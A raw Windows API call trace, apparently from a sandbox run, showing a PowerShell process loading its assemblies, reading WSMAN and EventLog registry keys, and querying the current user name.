	[0758.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0758.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0758.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0758.319] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0758.319] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0758.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0758.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0759.572] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0759.572] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0759.572] CoTaskMemFree (pv=0x2b2120) 
	[0759.574] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0759.574] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0759.574] CoTaskMemFree (pv=0x2b2120) 
	[0759.575] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0759.575] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0759.575] CoTaskMemFree (pv=0x2b2120) 
	[0759.577] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0759.577] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0759.577] CoTaskMemFree (pv=0x2b2120) 
	[0759.587] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0759.587] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0759.587] CoTaskMemFree (pv=0x2b2120) 
	[0759.593] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0759.593] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0759.593] CoTaskMemFree (pv=0x2b2120) 
	[0759.594] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0759.594] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0759.594] CoTaskMemFree (pv=0x2b2120) 
	[0759.598] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6b8 | out: phkResult=0x16d6b8*=0x2dc) returned 0x0
	[0759.599] RegQueryInfoKeyW (in: hKey=0x2dc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d5bc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d5b8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d5bc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d5b8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0759.599] CoTaskMemFree (pv=0x0) 
	[0759.600] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0759.600] RegEnumValueW (in: hKey=0x2dc, dwIndex=0x0, lpValueName=0x263c80, lpcchValueName=0x16d668, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x16d668, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0759.600] CoTaskMemFree (pv=0x263c80) 
	[0759.600] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0759.600] RegEnumValueW (in: hKey=0x2dc, dwIndex=0x1, lpValueName=0x263c80, lpcchValueName=0x16d668, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x16d668, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0759.600] CoTaskMemFree (pv=0x263c80) 
	[0759.600] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0759.600] RegEnumValueW (in: hKey=0x2dc, dwIndex=0x2, lpValueName=0x263c80, lpcchValueName=0x16d668, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x16d668, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0759.600] CoTaskMemFree (pv=0x263c80) 
	[0759.601] RegQueryValueExW (in: hKey=0x2dc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d64c, lpData=0x0, lpcbData=0x16d648*=0x0 | out: lpType=0x16d64c*=0x1, lpData=0x0, lpcbData=0x16d648*=0x8) returned 0x0
	[0759.601] CoTaskMemAlloc (cb=0xc) returned 0x2d48d0
	[0759.601] RegQueryValueExW (in: hKey=0x2dc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d61c, lpData=0x2d48d0, lpcbData=0x16d618*=0x8 | out: lpType=0x16d61c*=0x1, lpData="2.0", lpcbData=0x16d618*=0x8) returned 0x0
	[0759.601] CoTaskMemFree (pv=0x2d48d0) 
	[0775.034] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d608 | out: phkResult=0x16d608*=0x310) returned 0x0
	[0775.034] RegQueryInfoKeyW (in: hKey=0x310, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d50c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d508, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d50c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d508*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0775.034] CoTaskMemFree (pv=0x0) 
	[0775.034] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0775.034] RegEnumValueW (in: hKey=0x310, dwIndex=0x0, lpValueName=0x263c80, lpcchValueName=0x16d5b8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x16d5b8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0775.034] CoTaskMemFree (pv=0x263c80) 
	[0775.034] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0775.034] RegEnumValueW (in: hKey=0x310, dwIndex=0x1, lpValueName=0x263c80, lpcchValueName=0x16d5b8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x16d5b8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0775.034] CoTaskMemFree (pv=0x263c80) 
	[0775.034] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0775.034] RegEnumValueW (in: hKey=0x310, dwIndex=0x2, lpValueName=0x263c80, lpcchValueName=0x16d5b8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x16d5b8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0775.034] CoTaskMemFree (pv=0x263c80) 
	[0775.034] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d59c, lpData=0x0, lpcbData=0x16d598*=0x0 | out: lpType=0x16d59c*=0x1, lpData=0x0, lpcbData=0x16d598*=0x8) returned 0x0
	[0775.034] CoTaskMemAlloc (cb=0xc) returned 0x2d4770
	[0775.034] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0x16d56c, lpData=0x2d4770, lpcbData=0x16d568*=0x8 | out: lpType=0x16d56c*=0x1, lpData="2.0", lpcbData=0x16d568*=0x8) returned 0x0
	[0775.034] CoTaskMemFree (pv=0x2d4770) 
	[0775.036] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0775.036] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0775.036] CoTaskMemFree (pv=0x2b2120) 
	[0775.041] CoTaskMemAlloc (cb=0x104) returned 0x2b2120
	[0775.041] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b2120, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0775.041] CoTaskMemFree (pv=0x2b2120) 
	[0775.047] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d638 | out: phkResult=0x16d638*=0x314) returned 0x0
	[0775.050] RegQueryInfoKeyW (in: hKey=0x314, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d5ac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d5a8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d5ac*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d5a8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0775.050] CoTaskMemFree (pv=0x0) 
	[0775.051] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0775.051] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x0, lpName=0x263c80, lpcchName=0x16d638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0775.051] CoTaskMemFree (pv=0x263c80) 
	[0775.052] CoTaskMemFree (pv=0x0) 
	[0775.052] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0775.052] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x1, lpName=0x263c80, lpcchName=0x16d638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0775.052] CoTaskMemFree (pv=0x263c80) 
	[0775.052] CoTaskMemFree (pv=0x0) 
	[0775.052] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0775.052] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x2, lpName=0x263c80, lpcchName=0x16d638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0775.052] CoTaskMemFree (pv=0x263c80) 
	[0775.052] CoTaskMemFree (pv=0x0) 
	[0775.052] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0775.052] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x3, lpName=0x263c80, lpcchName=0x16d638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0775.052] CoTaskMemFree (pv=0x263c80) 
	[0775.052] CoTaskMemFree (pv=0x0) 
	[0775.052] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0775.052] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x4, lpName=0x263c80, lpcchName=0x16d638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0775.052] CoTaskMemFree (pv=0x263c80) 
	[0775.052] CoTaskMemFree (pv=0x0) 
	[0775.052] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0775.052] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x5, lpName=0x263c80, lpcchName=0x16d638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0775.052] CoTaskMemFree (pv=0x263c80) 
	[0775.052] CoTaskMemFree (pv=0x0) 
	[0775.052] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0775.052] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x6, lpName=0x263c80, lpcchName=0x16d638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0775.053] CoTaskMemFree (pv=0x263c80) 
	[0775.053] CoTaskMemFree (pv=0x0) 
	[0775.053] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0775.053] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x7, lpName=0x263c80, lpcchName=0x16d638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0775.053] CoTaskMemFree (pv=0x263c80) 
	[0775.053] CoTaskMemFree (pv=0x0) 
	[0775.053] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0775.053] RegEnumKeyExW (in: hKey=0x314, dwIndex=0x8, lpName=0x263c80, lpcchName=0x16d638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0775.053] CoTaskMemFree (pv=0x263c80) 
	[0775.053] CoTaskMemFree (pv=0x0) 
	[0775.053] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x318) returned 0x0
	[0775.053] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x0) returned 0x2
	[0775.053] RegOpenKeyExW (in: hKey=0x314, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x31c) returned 0x0
	[0775.053] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x0) returned 0x2
	[0775.053] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x320) returned 0x0
	[0775.054] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x0) returned 0x2
	[0775.054] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x324) returned 0x0
	[0775.054] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x0) returned 0x2
	[0775.054] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x328) returned 0x0
	[0775.054] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x0) returned 0x2
	[0775.054] RegOpenKeyExW (in: hKey=0x314, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x32c) returned 0x0
	[0775.054] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x0) returned 0x2
	[0775.054] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x330) returned 0x0
	[0775.054] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x0) returned 0x2
	[0775.054] RegOpenKeyExW (in: hKey=0x314, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x334) returned 0x0
	[0775.054] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x0) returned 0x2
	[0775.055] RegOpenKeyExW (in: hKey=0x314, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x338) returned 0x0
	[0775.055] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x33c) returned 0x0
	[0775.055] RegCloseKey (hKey=0x33c) returned 0x0
	[0775.055] RegCloseKey (hKey=0x314) returned 0x0
	[0775.056] RegCloseKey (hKey=0x338) returned 0x0
	[0776.919] CoTaskMemAlloc (cb=0x804) returned 0x1b3ee5c0
	[0776.920] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3ee5c0, nSize=0x16d8a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d8a8) returned 0x1
	[0776.921] CoTaskMemFree (pv=0x1b3ee5c0) 
	[0776.922] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0776.922] GetUserNameW (in: lpBuffer=0x263c80, pcbBuffer=0x16d8e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d8e8) returned 1
	[0776.923] CoTaskMemFree (pv=0x263c80) 
	[0776.940] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x340) returned 0x0
	[0776.940] RegQueryInfoKeyW (in: hKey=0x340, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d55c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d558, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d55c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d558*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.940] CoTaskMemFree (pv=0x0) 
	[0776.940] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0776.940] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x0, lpName=0x263c80, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.940] CoTaskMemFree (pv=0x263c80) 
	[0776.940] CoTaskMemFree (pv=0x0) 
	[0776.941] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0776.941] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x1, lpName=0x263c80, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.941] CoTaskMemFree (pv=0x263c80) 
	[0776.941] CoTaskMemFree (pv=0x0) 
	[0776.941] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0776.941] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x2, lpName=0x263c80, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.941] CoTaskMemFree (pv=0x263c80) 
	[0776.941] CoTaskMemFree (pv=0x0) 
	[0776.941] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0776.941] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x3, lpName=0x263c80, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.941] CoTaskMemFree (pv=0x263c80) 
	[0776.941] CoTaskMemFree (pv=0x0) 
	[0776.941] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0776.941] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x4, lpName=0x263c80, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.942] CoTaskMemFree (pv=0x263c80) 
	[0776.942] CoTaskMemFree (pv=0x0) 
	[0776.942] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0776.942] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x5, lpName=0x263c80, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.942] CoTaskMemFree (pv=0x263c80) 
	[0776.942] CoTaskMemFree (pv=0x0) 
	[0776.942] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0776.942] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x6, lpName=0x263c80, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.942] CoTaskMemFree (pv=0x263c80) 
	[0776.942] CoTaskMemFree (pv=0x0) 
	[0776.942] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0776.942] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x7, lpName=0x263c80, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.942] CoTaskMemFree (pv=0x263c80) 
	[0776.942] CoTaskMemFree (pv=0x0) 
	[0776.942] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0776.942] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x8, lpName=0x263c80, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0776.943] CoTaskMemFree (pv=0x263c80) 
	[0776.943] CoTaskMemFree (pv=0x0) 
	[0776.943] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x344) returned 0x0
	[0776.943] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x0) returned 0x2
	[0776.943] RegOpenKeyExW (in: hKey=0x340, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x348) returned 0x0
	[0776.943] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x0) returned 0x2
	[0776.943] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x34c) returned 0x0
	[0776.943] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x0) returned 0x2
	[0776.943] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x350) returned 0x0
	[0776.944] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x0) returned 0x2
	[0776.944] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x354) returned 0x0
